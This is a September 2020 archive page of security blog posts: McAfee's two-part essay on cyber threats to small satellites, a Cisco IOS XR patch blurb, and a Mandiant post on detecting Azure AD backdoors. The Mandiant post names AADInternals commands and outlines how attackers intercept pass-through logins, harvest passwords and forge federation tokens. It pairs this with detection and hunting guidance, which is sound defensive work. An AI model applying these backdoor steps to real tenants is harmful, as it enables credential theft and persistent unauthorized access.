Monthly Archives: September 2020

Securing Space 4.0 – One Small Step or a Giant Leap? Part 1

McAfee Advanced Threat Research (ATR) is collaborating with Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland

The essence of Space 4.0 is the introduction of smaller, cheaper, faster-to-the-market satellites in low-earth-orbit into the value chain and the exploitation of the data they provide. Space research and communication prior to Space 4.0 was primarily focused on astronomy and limited to that of governments and large space agencies. As technology and society evolves to consume the “New Big Data” from space, Space 4.0 looks set to become the next battleground in the defense against cybercriminals. Space 4.0 data can range from earth observation sensing to location tracking information and applied across many vertical uses cases discussed later in this blog. In the era of Space 4.0 the evolution of the space sector is rapidly changing with a lower cost of launching, combined with public and private partnerships that open a whole new dimension of connectivity. We are already struggling to secure our data on earth, we must now understand and secure how our data will travel through space constellations and be stored in cloud data centers on earth and in space.

Low Earth Orbit (LEO) satellites are popular for scientific usage but how secure are they? The Internet of Things (IoT) introduced a myriad of insecure devices onto the Internet due to the low cost of processors and high-speed connectivity, but the speed in its adoption resulted in a large fragmentation of insecure hardware and software across business verticals.

Space 4.0 is now on course for a similar rapid adoption with nanosats as we prepare to see a mass deployment of cheap satellites into LEO. These small satellites are being used across government, academic and commercial sectors for different use cases that require complex payloads and processing. Many nanosats can coexist on a single satellite. This means that the same satellite backbone circuit infrastructure can be shared, reducing build and launch costs and making space data more accessible.

To date, satellites have typically been relay type devices repeating signals to and from different locations on earth in regions with poor internet connectivity, but that is all set to change with a mass deployment of smarter satellite devices using inter-satellite links (ISL) in  constellations like Starlink which aim to provide full high speed broadband global coverage. As the Space 4.0 sector is moving from private and government sectors to general availability, this makes satellites more accessible from a cost perspective, which will attract threat actors other than nation states, such as cyber criminals. Space 4.0 also brings with it new service delivery models such as Ground Station as a Service (GSaaS) with AWS and Azure Orbital and Satellite as a Service (SataaS). With the introduction of these, the satellite will become another device connecting to the cloud.

In our research we analyze the ecosystem to understand the latest developments and threats in relation to cybersecurity in space and whether we are ready to embrace Space 4.0 securely.

Space 4.0 Evolution

What is the Industrial 4th Revolution? The original industrial revolution started with the invention of steam engines then electricity, computers and communication technology. Industry 4.0 is about creating a diverse, safe, healthy, just world with clean air, water, soil and energy, as well as finding a way to pave the path for the innovations of tomorrow.

The first space era, or Space 1.0, was the study of astronomy, followed by the Apollo moon landings and then the inception of the International Space Station (ISS). Space 4.0  is analogous to Industry 4.0, which is considered as the unfolding fourth industrial revolution of manufacturing and services. Traditionally, access to space has been the domain of governments and large space agencies (such as NASA or the European Space Agency) due to the large costs involved in the development, deployment and operation of satellites. In recent years, a new approach to using space for commercial, economic and societal good has been driven by private enterprises in what is termed New Space. When combined with the more traditional approach to space activity, the term “Space 4.0” is used. Space 4.0 is applicable across a wide range of vertical domains, including but not limited to:

  • Ubiquitous broadband
  • Autonomous vehicles
  • Earth observation
  • Disaster mitigation/relief
  • Human spaceflight
  • Exploration

Cyber Threat Landscape Review

The Cyber Threat Landscape has evolved greatly over the past 20 years with the convergence of Information Technology (IT), Operational Technology (OT) and IoT. Protecting consumers, enterprises and critical infrastructure with the rapid parallel innovation of technology and cybercriminals is a constant challenge. While technology and attacks evolve rapidly the cybercriminal motive remains a constant; make money and maximize profit by exploiting a combination of users and technology.

Cybercriminals have much more capabilities now than they did 10 years ago due to the rise of Cybercrime as a Service (CaaS). Once an exploit for a vulnerability has been developed, it can then be weaponized into an exploit kit or ransomware worm, such as WannaCry. Cybercriminals will follow the path of least resistance to achieve their goal of making money.

Nearly every device class across the business verticals, ranging from medical devices to space Very-small-aperture terminals (VSAT), have been hacked by security researchers, as evident from Blackhat and Defcon trends.

From a technology stack perspective (hardware and software) there have been vulnerabilities discovered and exploits developed across all layers where we seek to establish some form of trustworthiness when connected to the internet; browsers, operating systems, protocols, hypervisors, enclaves, cryptographic implementations, system on chips (SoC) and processors.

Not all these vulnerabilities and exploits become weaponized by cybercriminals, but it does highlight the fact that the potential exists. Some notable weaponized exploits are:

  1. Stuxnet worm
  2. WannaCry ransomware worm
  3. Triton malware
  4. Mirai Botnet

Some recent major industry vulnerabilities were: BlueKeep (Windows RDP Protocol), SMBGhost (Windows SMB Protocol), Ripple20 (Treck embedded TCP/IP library), Urgent 11 (VxWorks TCP/IP library), Heartbleed (OpenSSL library), Cloudbleed (Cloudflare), Curveball (Microsoft Crypto API), Meltdown and Spectre (Processor side channels).

Cybercriminals will adapt quickly to maximize their profit as we saw with the COVID-19 pandemic and the mass remote workforce. They will quickly understand the operating environment changes and how they can reach their goals by exploiting users and technology, whichever is the weakest link. The easiest entry point into an organization will be through identity theft or weak passwords being used in remote access protocols such as RDP.

Cybercriminals moved to the Dark Web to hide identity and physical location of servers or using bullet-proof providers to host their infrastructure. What if these services are hosted in space? Who is the legal entity and who is responsible?

McAfee Enterprise Supernova Cloud analysis reports that:

  • Nearly one in 10 files shared in the cloud with sensitive data have public access, an increase of 111% year over year
  • One in four companies have had their sensitive data downloaded from the cloud to an unmanaged personal device, where they cannot see or control what happens to the data
  • 91% of cloud services do not encrypt data at rest
  • Less than 1% of cloud services allow encryption with customer-managed keys

The transition to the cloud, when done securely, is the right business decision. However, when not done securely it can leave your services and data/data lakes accessible to the public through misconfigurations (shared responsibility model), insecure APIs, and identity and access management issues. Attackers will always go for the low hanging fruit such as open AWS buckets and credentials through vendors in the supply chain.

One of the key initiatives, and now industry benchmark, is the MITRE ATT&CK framework which enumerates the TTPs from real word incidents across Enterprise (Endpoint and Cloud), Mobile and ICS. This framework has proved to be very valuable in enabling organizations to understand adversary TTPs and the corresponding protect, detect and response controls required in their overall defense security architecture. We may well see a version of MITRE ATT&CK evolve for Space 4.0.

Space Cyber Threat Landscape Review

Threat actors know no boundaries as we have seen criminals move from traditional crime to cybercrime using whatever means necessary to make money. Likewise, technology communication traverses many boundaries across land, air, sea and space. With the reduced costs to entry and the commercial opportunities with Space 4.0 big data, we expect to see cybercriminals innovating within this huge growth area. The Cyber Threat Landscape can be divided into vulnerabilities discovered by security researchers and actual attacks reported in the wild. This allows us to understand the technologies within the space ecosystem that are known to contain vulnerabilities and what capabilities threat actors have and are using in the wild.

Vulnerabilities discovered to date have been within VSAT terminal systems and intercepting communications. There have been no vulnerabilities disclosed on actual satellites from figure 1 below.

Figure 1 – Security Researcher space vulnerability disclosures

To date, satellites have mostly been controlled by governments and the military so little information is available as to whether an actual satellite has been hacked. We do expect to see that change with Space 4.0 as these satellites will be more accessible from a hardware and software perspective to do security analysis. Figure 2 below highlights reported attacks in the wild

Figure 2 – Reported Attacks in the Wild

In McAfee’s recent threat research, “Operation North Star”, we observed an increase in malicious cyber activity targeting the Aerospace and Defense industry. The objective of these campaigns was to gather information on specific programs and technologies.

Since the introduction of the cloud, it appears everything has become a device that interacts with a service. Even cybercriminals have been adapting to the service model. Space 4.0 is no different as we start to see the adoption of the Ground Station as a Service (GSaaS) and Satellite as a Service (SataaS) models per figure 3 below. These services are opening in the space sector due to the acceleration of vendors into Space 4.0 to help keep their costs down. Like any new ecosystem this will bring new attack surfaces and challenges which we will discuss in the Threat Modelling section.

Figure 3 – New Devices and Services for Space 4.0


So, with the introduction of cheap satellites using commercial off-the-shelf (COTS) components and new cloud services is it just a matter of time before we see mass satellite attacks and compromise?

Space 4.0 Data Value

The global space industry grew at an average rate of 6.7% per year between 2005 and 2017 and is projected to rise from its current value of $350 billion to $1.3 trillion per annum by 2030. This rise is driven by new technologies and business models which have increased the number of stakeholders and the application domains which they service in a cost-effective way. The associated increase in data volume and complexity has, among other developments, resulted in increasing concerns over the security and integrity of data transfer and storage between satellites, and between ground stations and satellites.

The McAfee Supernova report shows that data is exploding out of enterprises and into the cloud. We are now going to see the same explosion from Space 4.0 to the cloud as vendors race to innovate and monetize data from low cost satellites in LEO.

According to Microsoft the processing of data collected from space at cloud-scale to observe the Earth will be “instrumental in helping address global challenges such as climate change and furthering of scientific discovery and innovation”. The value of data from space must be viewed from the perspective of the public and private vendors who produce and consume such data. Now that satellite launch costs have reduced, producing this data becomes more accessible to commercial markets, so we are going to see much innovation in data analytics to improve our lives, safety and preservation of the earth. This data can be used to improve emergency response times to save lives, monitoring illegal trafficking, aviation tracking blind spots, government scientific research, academic research, improving supply chains and monitoring the earth’s evolution, such as climate change effects. Depending on the use case, this data may need to be confidential, may have privacy implications when tracking and may have substantial value in the context of new markets, innovation and state level research. It is very clear that data from space will have much value as new markets evolve, and cybercriminals will most certainly target that data with the intent to hold organizations to ransom or sell data/analytics innovation to competitors to avoid launch costs. Whatever the use case and value of the data traveling through space may be, we need to ensure that it moves securely by providing a trustworthy end to end ecosystem.

As we progress towards the sixth digital era, our society, lives and connectivity will become very dependent on off-planet data and technology in space, starting with SataaS.

In Part 2 we will discuss remote computers in Space, the Space 4.0 threat model and what we must do to secure Space 4.0 moving forward.

McAfee would like to thank Cork Institute of Technology (CIT) and their Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland for their collaboration in our mission to securing Space 4.0.

The post Securing Space 4.0 – One Small Step or a Giant Leap? Part 1 appeared first on McAfee Blogs.

Securing Space 4.0 – One Small Step or a Giant Leap? Part 2

McAfee Advanced Threat Research (ATR) is collaborating with Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center in Cork, Ireland

In the first of this two-part blog series we introduced Space 4.0, its data value and how it looks set to become the next battleground in the defense against cybercriminals. In part two we discuss the architectural components of Space 4.0 to threat model the ecosystem from a cybersecurity perspective and understand what we must do to secure Space 4.0 moving forward.

Nanosats: Remote Computers in Space

A satellite is composed of a payload and a bus. The payload is the hardware and software required for the mission or satellite’s specific function, such as imaging equipment for surveillance. The bus consists of the infrastructure or platform that houses the payload, such as thermal regulation and command and control. Small satellites are space craft typically weighing less than 180 kilograms and, within that class of satellites, is what we call nanosatellites or nanosats which typically weigh between 1-10 kilograms. Cubesats are a class of nanosat so you will often hear the term used interchangeably, and for the context of Space 4.0 security, we can assume they are the same device. Nanosats significantly reduce launch costs due to their small size and the fact that many of these devices can be mounted on board a larger single satellite for launch.

Commercial off-the-shelf (COTS) Cubesats typically use free open source software such as FreeRTOS or KubOS for the on-board operating system. However, other systems are possible, with drivers available for most of the hardware on Linux and Windows OS. KubOS is an open source flight software framework for satellites and has cloud-based mission control software, Major Tom, to operate nanosats or a constellation. We mention KubOS here as it is a good example of what the current Space 4.0 operating model looks like today. While we have not reviewed KubOS from a security perspective, developing a secure framework for satellites is the right path forward, allowing mission developers to focus on the payload.

Some of the use cases available with Cubesats are:

  1. File transfers
  2. Remote communication via uplink/downlink
  3. Intra-satellite and inter-satellite communications
  4. Payload services such as camera and sensors telemetry
  5. Software Updates

KubOS is “creating a world where you can operate your small satellite from your web browser or iPhone”. KubOSobjective is to allow customers to send bits and not rockets to space and it is defining a new era of software-designed satellites. The satellite model is changing from relay type devices to remote computers in space using COTS components and leveraging TCP/IP routing capabilities. This model shift also means that there is more software executing on these satellites and more complex payload processing or interaction with the software stack and hence more attack surface.

To date, attacks on satellite systems from a cybersecurity perspective have typically been in the context of VSAT terminals, eavesdropping and hijacking. While there have been vulnerabilities found in the VSAT terminal software and its higher-level custom protocols, there seems to have been no focus and vulnerabilities discovered within the network software stack of the satellite itself. This may be since satellites are very expensive, as well as closed source, so not accessible to security researchers or cybercriminals, but this security by obscurity will not provide protection with the new era of nanosats. Nanosats use COTS components which will be accessible to cybercriminals.

Due to the closed nature of satellites there has not been much published on their system hardware and software stack. However, the Consultative Committee for Space Data Systems (CCSDS), which develops standards and specifications including protocols for satellite communications, does give some insight. The CCSDS technical domains are:

  1. Space Internetworking Services
  2. Mission Ops. And Information Management Services
  3. Spacecraft Onboard Interface Services
  4. System Engineering
  5. Cross Support Services
  6. Space Link Services

The CCSDS standards are divided into color codes to represent recommended standards and practices versus informational and experimental. This is a very large source of data communications for satellite designers to aid them in a reference for implementation. However, as we have observed over the cyber threat landscape of the past few decades, secure standards and specifications for hardware, software and protocols do not always translate to secure implementation. The CCSDS defines a TCP/IP stack suitable for transmission over space datalinks as per figure 1 below. Satellites that become more connected, just like any other device on the internet, their network and protocol software stack will become more accessible and targeted. As we discussed in part 1 <insert link> of our Space 4.0 blog series, there have been many TCP/IP and remote protocol related vulnerabilities in both embedded devices and even state of the art operating systems such as Windows 10. The TCP/IP stack and remote protocol implementations are a common source of vulnerabilities due to the complexities of parsing in unsafe memory languages such as C and C++. There does not appear to be any open source implementations of the CCSDS TCP/IP protocol stack.

Figure 1 – CCSDS Space communications protocols reference model

The CubeSat Protocol (CSP) is a free open source TCP/IP stack implementation for communication over space datalinks, similar to the CCSDS TCP/IP stack. The CSP protocol library is implemented in C, open source and implemented in many Cubesats that have been deployed to space. The protocol can be used for communication from ground station to satellite, inter-satellite and the intra-satellite communication bus. There have been 3 vulnerabilities to date reported in this protocol.

Figure 2 below shows what a Cubesat architecture looks like from a trust boundary perspective relative to the satellite and other satellites within the constellation and the earth.

Figure 2 – Space LEO Cubesat architecture trust boundaries

No hardware, software, operating system or protocol is completely free of vulnerabilities. What is important from a security perspective is:

  1. The accessibility of the attack surface
  2. The motives and capabilities of the adversary to exploit an exposed vulnerability if present in the attack surface

As these low-cost satellites get launched in our LEO and become more connected, any exposed technology stack will become increasingly targeted by cybercriminals.

Space 4.0 Threat Modeling

This Space 4.0 threat model focuses on the cybercriminal and how they can exploit Space 4.0 data for monetization. The following Space 4.0 factors will make it more accessible to cybercriminals:

  1. Mass deployment of small satellites to LEO
  2. Cheaper satellites with COTS components and increased satellite on board software processing (no longer relay devices)
  3. Satellite service models, Ground Station-as-a-Service (GSaaS) and Satellite-as-a-Service (SataaS) and shared infrastructure across government, commercial and academic
  4. Satellite connectivity and networks in space (ISL – inter-satellite links)
  5. Space 4.0 data value

Space security has typically been analyzed from the perspective of ground segment, communications or datalink and space segment. Additionally, the attack classes have been categorized as electronic (jamming), eavesdropping, hijacking and control. Per figure 3 below, we need to think about Space 4.0 with a cybersecurity approach due to the increased connectivity and data, as opposed to the traditional approach of ground, communication and space segments. Cybercriminals will target the data and systems as opposed to the RF transmission layer.

Figure 3 – Space 4.0 threat modeling architecture

It is important to consider the whole interconnectivity of the Space 4.0 ecosystem as cybercriminals will exploit any means possible, whether that be direct or indirect access (another trusted component). Open source networked ground stations such as SatNOGs and the emerging NyanSat are great initiatives for space research but we should consider these in our overall threat model as they provide mass connectivity to the internet and space.

The traditional space security model has been built on a foundation of cost as a barrier to entry and perimeter-based security due to lack of physical access and limited remote access to satellites. However, once a device is connected to the internet the threat model changes and we need to think about a satellite as any other device which can be accessed either directly or indirectly over the internet.

In addition, if a device can be compromised in space remotely or through the supply chain, then that opens a new attack class of space to cloud/ground attacks.

Users and trusted insiders will always remain a big threat from a ground station perspective, just like enterprise security today, as they can potentially get direct access to the satellite control.

The movement of ground services to the cloud is a good business model if designed and implemented securely, however a compromise would impact many devices in space being controlled from the GSaaS. It is not quite clear where the shared responsibility starts and ends for the new SataaS and GSaaS Space 4.0 service models but the satellite key management system (KMS), data, GSaaS credentials and analytics intellectual property (this may reside in the user’s environment, the cloud or potentially the satellite but for the purposes of this threat model we assume the cloud) will be much valued assets and targeted.

From the Cyber and Space Threat Landscape review in part 1 <insert link>, combined with our understanding of the Space 4.0 architecture and attack surfaces, we can start to model the threats in Table 1 below.

Table 1 – Space 4.0 threats, attack classes and layers, and attack vectors

Based on the above threat model, let’s discuss a real credible threat and attack scenario. From our Space cyber threat landscape review in part 1 of this blog series, there were attacks on ground stations in 2008 at the Johnson Space Center and for a Nasa research satellite. In a Space 4.0 scenario, the cybercriminal attacks the ground station through phishing to get access to satellite communications (could also be a supply chain attack to get a known vulnerable satellite system into space). The cybercriminal uses an exploit being sold on the underground to exploit a remote wormable vulnerability within the space TCP/IP stack or operating system of the satellite in space, just like we saw EternalBlue being weaponized by WannaCry. Once the satellite has been compromised the malware can spread between satellite vendors using their ISL communication protocol to propagate throughout the constellation. Once the constellation has been compromised the satellite vendor can be held to ransom, causing major disruption to Space 4.0 data and/or critical infrastructure.

Moving Forward Securely for a Trustworthy Space 4.0 Ecosystem

Establishing a trustworthy Space 4.0 ecosystem is going to require strong collaboration between cyber threat research teams, government, commercial and academia in the following areas:

  1. Governance and regulation of security standards implementation and certification/validation of satellite device security capabilities prior to launch
  2. Modeling the evolving threat landscape against the Space 4.0 technology advancements
  3. Secure reference architectures for end to end Space 4.0 ecosystem and data protection
  4. Security analysis of the CCSDS protocols
  5. Design of trustworthy platform primitives to thwart current and future threats must start with a security capable bill of materials (BOM) for both hardware and software starting with the processor then the operating system, frameworks, libraries and languages. Hardware enabled security to achieve confidentiality, integrity, availability and identity so that satellite devices may be resilient when under attack
  6. Visibility, detection and response capabilities within each layer defined in our Space 4.0 architecture threat model above
  7. Development of a MITRE ATT&CK specifically for Space 4.0 as we observe real world incidents so that it can be used to strengthen the overall defensive security architecture using TTPs and threat emulation

Space 4.0 is moving very fast with GSaaS, SataaS and talk of space data centers and high-speed laser ISL; security should not be an inhibitor for time to market but a contributor to ensure that we have a strong security foundation to innovate and build future technology on with respect to the evolving threat landscape. Space communication predates the Internet so we must make sure any legacy limitations which would restrict this secure foundation are addressed. As software complexity for on board processing and connectivity/routing capability increases by moving to the edge (space device) we will see vulnerabilities within the Space 4.0 TCP/IP stack implementation.

This is a pivotal time for the secure advancement of Space 4.0 and we must learn from the mistakes of the past with IoT where the rush to adopt new and faster technology resulted in large scale deployment of insecure hardware and software. It has taken much effort and collaboration between Microsoft and the security research community since Bill Gates announced the Trustworthy Computing initiative in 2002 to arrive at the state-of-the-art Windows 10 OS with hardware enabled security. Likewise, we have seen great advancements on the IoT side with ARM Platform Security Architecture and Azure Sphere. Many security working groups and bodies have evolved since 2002, such as the Trust Computing Group, Confidential Computing Consortium, Trusted Connectivity Alliance and Zero Trust concept to name a few. There are many trustworthy building block primitives today to help secure Space 4.0, but we must leverage at the concept phase of innovation and not once a device has been launched into space; the time is now to secure our next generation infrastructure and data source. Space security has not been a priority for governments to date but that seems all set to change with the “Memorandum on Space Policy Directive-5—Cybersecurity Principles for Space Systems”.

We should pause here for a moment and recognize the recent efforts from the cybersecurity community to secure space, such as the Orbital Security Alliance, S-ISAC, Mantech and Defcon Hack-a-Sat.

KubOS is being branded as the Android of space systems and we are likely to see a myriad of new software and hardware emerge for Space 4.0. We must work together to ensure Space 4.0 connectivity does not open our global connectivity and infrastructure dependency to the next Mirai botnet or WannaCry worm on LEO.

McAfee would like to thank Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland for their collaboration in our mission to secure Space 4.0.

The post Securing Space 4.0 – One Small Step or a Giant Leap? Part 2 appeared first on McAfee Blogs.

Cisco Issues Patches For 2 High-Severity IOS XR Flaws Under Active Attacks

Cisco yesterday released security patches for two high-severity vulnerabilities affecting its IOS XR software that were found exploited in the wild a month ago.Tracked as CVE-2020-3566 and CVE-2020-3569, details for both zero-day unauthenticated DoS vulnerabilities were made public by Cisco late last month when the company found hackers actively exploiting Cisco IOS XR Software that is installed

Detecting Microsoft 365 and Azure Active Directory Backdoors

Mandiant has seen an uptick in incidents involving Microsoft 365 (M365) and Azure Active Directory (Azure AD). Most of these incidents are the result of a phishing email coercing a user to enter their credentials used for accessing M365 into a phishing site. Other incidents have been a result of password spraying, password stuffing, or simple brute force attempts against M365 tenants. In almost all of these incidents, the user or account was not protected by multi-factor authentication (MFA).

These opportunistic attacks are certainly the most common form of compromise for M365 and Azure AD, and are usually the initial vector to establish persistence. During both incident response (IR) engagements and proactive cloud assessments we are often asked:

  • What are some other types of attacks that Mandiant is seeing against M365 and Azure AD?
  • Is it possible for an on-premises compromise to “vertically” move to M365 and Azure AD?
  • If a global administrator account is compromised, is it possible to maintain persistence even after the compromised account has been detected, a password reset has occurred, and MFA has been applied?

AADInternals PowerShell Module

In some incidents, Mandiant has witnessed attackers utilizing a PowerShell module called AADInternals, which can allow an attacker to vertically move from on-premises to Azure AD, establish backdoors, steal passwords, generate user security tokens, and bypass MFA protections. This PowerShell module has allowed attackers to maintain persistence in the tenant even after initial eradication efforts were conducted.

To see this module in action and understand how it works, Dr. Nestori Syynimaa’s PSCONFEU 2020 presentation, Abusing Azure Active Directory: Who would you like to be today?, provides an in-depth overview of the module.

To detect the use of AADInternals, it is important to understand how some of these attacks work. Once an understanding is established, abnormal usage can be detected through a combination of log analysis and host-based indicators.

Backdoor 1: Abusing Pass-Through Authentication

Attacker Requirements

  • Local Administrative Access to a server running Pass-through Authentication

Or

  • M365 global administrator credentials

The AADInternals PowerShell module contains a function called Install-AADIntPTASPY. The function works by inserting itself as a man-in-the-middle within the Pass-through Authentication (PTA) process that occurs between Azure AD and the server running the PTA Agent in the on-premises environment. Commonly, the PTA Agent runs on the same on-premises server as Azure AD Connect (AAD Connect).

When PTA is enabled, every logon that occurs against Azure AD gets redirected to the PTA Agent on-premises. The PTA Agent asks an on-premises Active Directory Domain Controller if a password is valid for an authenticating account. If valid, the PTA Agent responds back to Azure AD to grant the requestor access. Figure 1 provides the workflow of Pass-through Authentication and where AADInternals can intercept the request.


Figure 1: Pass-through Authentication workflow

Once the function is running, every PTA attempt against Azure AD will be intercepted by the installed AADIntPTASpy module. The module will record the user’s password attempt and reply back to Azure AD on behalf of the PTA Agent. This reply advises Azure AD the password attempt was valid and grants the user access to the cloud, even if the password is incorrect. If an attacker has implanted AADIntPTASpy, they can log in as any user that attempts to authenticate using PTA—and will be granted access.

Additionally, all password attempts that are registered by the AADIntPTASpy module are recorded within a log file on the server (Default location: C:\PTASpy\PTASPy.csv). Figure 2 shows how the log file can be decoded to reveal a user’s password in cleartext.


Figure 2: PTASpy.csv decoded passwords

Not only will this function allow an attacker to login as any user who authenticates via PTA, but it will also act as a repository for collecting user passwords who are legitimately logging into Azure AD. This could allow an attacker to pivot their attack to other areas of the network—or use these credentials against other internet accessible portals that may leverage single-factor authentication (e.g., VPN gateway).

An attacker can use this module in one of two ways:

Method 1: On-Premises Compromise

An attacker has gained access to an on-premises domain and is able to laterally move to the AADConnect / PTA Agent Server. From this server, an attacker can potentially leverage the AADInternals PowerShell module and invoke the Install-AADIntPTASpy function.

Method 2: Cloud Compromise

If an attacker has successfully compromised an Azure AD global admin account, an attack can be conducted from an attacker’s own infrastructure. An attacker can install a PTA Agent on a server they manage and register the agent using the compromised global administrator account (Figure 3).


Figure 3: Azure AD Portal—registered Pass-through Authentication agents

Once registered with Azure AD, the rogue server will begin to intercept and authorize all login attempts. As with Method 1, this server can also be used to harvest valid credentials.

Backdoor 2: Abusing Identity Federation

Attacker Requirements

  • Local administrative access to AD and server running Active Directory Federation Services

Or

  • M365 global administrator credentials

Another method of authenticating to M365 is through the usage of federation services. When a M365 domain is configured as a federated domain, a trust is configured between M365 and an external identify provider. In many cases, this trust is established with an Active Directory Federation Services (ADFS) server for an on-premises Active Directory domain.

Once a trust is established, when a user logs into M365 using a federated domain, their request is redirected to the external identify provider (ADFS) where their authentication is validated (Figure 4). Once validated, the ADFS server provides the user a security token. This token is then trusted by M365 and grants the access to the platform.


Figure 4: Microsoft 365 Federation Sign-in workflow

AADInternals has a PowerShell function to craft security tokens, which mimics the ADFS authentication process. When providing the function a valid UserPrincipalName, Immutable ID and IssuerURI, an attacker can generate a security token as any user of the tenant. What’s even more concerning is that once this security token is generated, this can allow an attacker to bypass MFA.

As with Backdoor 1, this attack can either be performed from a compromised on-premises environment or from an attacker’s own infrastructure.

Method 1: On-Premises Compromise

Once an attacker has gained access to an on-premises domain with elevated access, they can begin to collect the required information to craft their own security tokens to backdoor into M365 as any user. An attacker will require:

  • A valid UserPrincipalName and Immutable.
    • Both of these attributes can be pulled from the on-premises Active Directory domain.
  • IssuerURI of the ADFS server and ADFS Signing certificate.
    • This can be obtained from an ADFS server when directly logged into the server or remotely querying the server via an privileged account.

Once an attacker has collected the necessary information, using the AADInternals Open-AADIntOffice365Portal command, a security token for the user can be generated granting an attacker access to M365 (Figure 5).


Figure 5: AADInternals Open-AADIntOffice365Portal command

Method 2: Cloud Compromise

If an attacker has a compromised an M365 Global Administrator account, using their own infrastructure, an attacker can use their administrative access to collect user information and reconfigure the tenant to establish their backdoor. In this method, an attacker will require:

  • A valid UserPrincipalName and valid ImmutableId.
    • Figure 6 shows how the Get-MsolUser command can obtain a user’s ImmutableId from Azure AD.


Figure 6: Get-MsolUser—list user UPN & ImmutableId

  • IssuerURI
    • This can be obtained by converting a managed domain to a federated domain. Figures 7 through 10 show how the AADInternals ConvertTo-AADIntBackdoor command (Figure 8) can be used to allow attacker to register their own IssuerURI for a federated domain.


Figure 7: Get-msoldomain—list of registered domains and authentication


Figure 8: ConvertTo-AADIntBackdoor—convert domain to federated authentication


Figure 9: Changed authentication method


Figure 10: Azure AD Portal registered domains

Note: To not interrupt production and authentication with an existing federated domain (and to remain undetected), an attacker may opt to register a new domain with the tenant.


Figure 11: AADInternals Open-AADIntOffice365Portal Command using new Federated domain

Once an attacker has properly configured the tenant, using the ImmutableId of any user, a security token can be generated by executing the Open-AADIntOffice365Portal command (Figure 11). This will allow an attacker to login as that user without the need for a valid certificate or a legitimate IssuerURI.

Fortunately for defenders, this method will generate a number of events in the unified audit log, which can be leveraged for monitoring and alerting.

Mitigation and Detection

Once persistence is established, it can be extremely difficult to detect login activity that is utilizing one of the previously described methods. In lieu of this, it is recommended to monitor and alert on M365 unified audit logs and Azure AD sign-in activity to detect anomalous activity.

Detection in FireEye Helix

Being that Mandiant has seen this methodology being used in the wild, we felt it was necessary to build these detections into our FireEye Helix security platform. Helix engineers have created sever new detection rules that monitor for detectable activity of an attacker making use of the AADInternals PowerShell module.

The following five rules will monitor a server’s event logs and alert upon the installation and usage of the AADInternals PowerShell module (Figure 12). The detection of these activities could be high fidelity alerts that an attacker is preparing to configure backdoors into M365 and Azure AD environments.


Figure 12: AADInternals Helix rules

If an attacker has successfully configured a backdoor using AADInternals, Helix will alert upon the following events registered in the Office 365 unified audit log and Azure Activity Log as indication of a possible event (Figure 13 and Figure 14). It is important to note that these alerts could be triggered upon legitimate administrator activity. When responding to these alerts, first check with your M365 and Azure AD administrator to verify the activity before raising a security event.


Figure 13: Office 365 and Azure Helix rules


Figure 14: PTA Connector Registered alert description

Hunting for Backdoors in M365 Unified Audit Logs and Azure AD Logs

If you suspect a global administrator account was compromised and you want to review Azure AD for indicators of potential abuse, the following should be reviewed (note that these same concepts can be used for proactive log monitoring):

  • From Azure AD Sign-ins logs, monitor logon activity from On-Premises Directory Synchronization Service Accounts. This account is used by the Azure AD Connect service (Figure 15).


Figure 15: Azure AD Sign-ins

  • Baseline the IP addresses used by this account and make sure the IPs match those assigned to the on-premises WAN infrastructure. If the attacker has configure a PTA Agent on their own infrastructure, seeing an IP that does not match your baseline could be an indicator that a rogue PTA Agent has been configured by the attacker (Figure 16).


Figure 16: Azure AD Sign-in logs—On-Premises Directory Synchronization Services account

From Azure AD Sign-ins, monitor and baseline Azure AD Sign-ins to the Azure AD Application Proxy Connector. Make sure to validate username, IP and location.

These events are typically only generated when a new PTA agent is connected to the tenant. This could be an indicator that an attacker has connected a rogue PTA server hosted on an attacker’s infrastructure (Figure 17).


Figure 17: Azure AD Sign-in logs—Azure AD Application Proxy Connector

If using Azure Sentinel, this event will also be registered in the Azure AuditLogs table as a “Register Connector” OperationName (Figure 18).


Figure 18: Register Connector—Azure Sentinel logs

  • In the Azure Management Portal under the Azure AD Connect blade, review all registered servers running PTA Agent. The Authentication Agent and IP should match your infrastructure (Figure 19).
    • Log in to https://portal.azure.com
      • Select Azure AD Connect > Pass-through Authentication


Figure 19: Azure Active Directory Pass-through Authentication agent status

  • Monitor and alert for "Directory Administration Activity" in Office 365 Security & Compliance Center’s unified audit log. When an attacker is able to create a domain federation within a compromised cloud tenant, and link this to attacker-owned infrastructure, this will generate activity in the log (Figure 21).
    • https://Protections.office.com/unifiedauitlog > Audit Log Search
    • Select Directory Administration Activates category to select all activities
    • Create New Alert Policy (Figure 20)


Figure 20: Unified Audit Log > Create new alert policy


Figure 21: Unified Audit Log filtered for domain related events

  • Using Azure Sentinel, more granular Directory Administration Activities can be modified for suspicious activity. This includes additions, deletions and modifications of domains and their authentication settings (Figure 22).
    • Monitoring for OfficeActivity Operations in Azure Sentinel can allow an organization to validate if this is normalized activity or if an attacker is working on setting up a backdoor for PTA or federation.
      • Table: OfficeActivity
        • Operation: Set-AcceptedDomain
        • Operation: Set-MsolDomainFederationSettings
        • Operation: Add-FederatedDomain
        • Operation: New-Accepted Domain
        • Operation: Remove-Accepted Domain
        • Operation: Remove-FederatedDomain


Figure 22: OfficeActivity Operations Azure Sentinel logs

Detection On-Premises

If an attacker is able to compromise on-premises infrastructure and access a server running AD Connect or ADFS services with the intention of leveraging a tool such as AADInternals to expand the scope of their access to include cloud, timely on-premises detection and containment is key. The following methods can be leveraged to ensure optimized visibility and detection for the scope of activities described in this post:

  • Treat ADFS and Azure AD Connect servers as Tier 0 assets.
    • Use a dedicated server for each. Do not install these roles and server in addition to other. All too often we are seeing Azure AD Connect running on a file server. 
  • Ensure PowerShell logging is optimized on AD Connect and ADFS servers
  • Review Microsoft-Windows-PowerShell/Operational logs on ADFS and AADConnect Server Logs.
    • If PowerShell logging is enabled, search for Event ID 4101. This event ID will record the event where AADInternals was installed (Figure 23).


Figure 23: EventID 410—Installed Module

  • Additionally, with this logging enabled, you will be able to review the PowerShell commands used by an attacker.
    • In PowerShell, run Get-Module -All and look for the presence of AADInternals (Figure 24).


Figure 24: Get-Module command to list installed modules

  • Alert for the presence of C:\PTASpy and C:\PTASpy\PTASpy.csv.
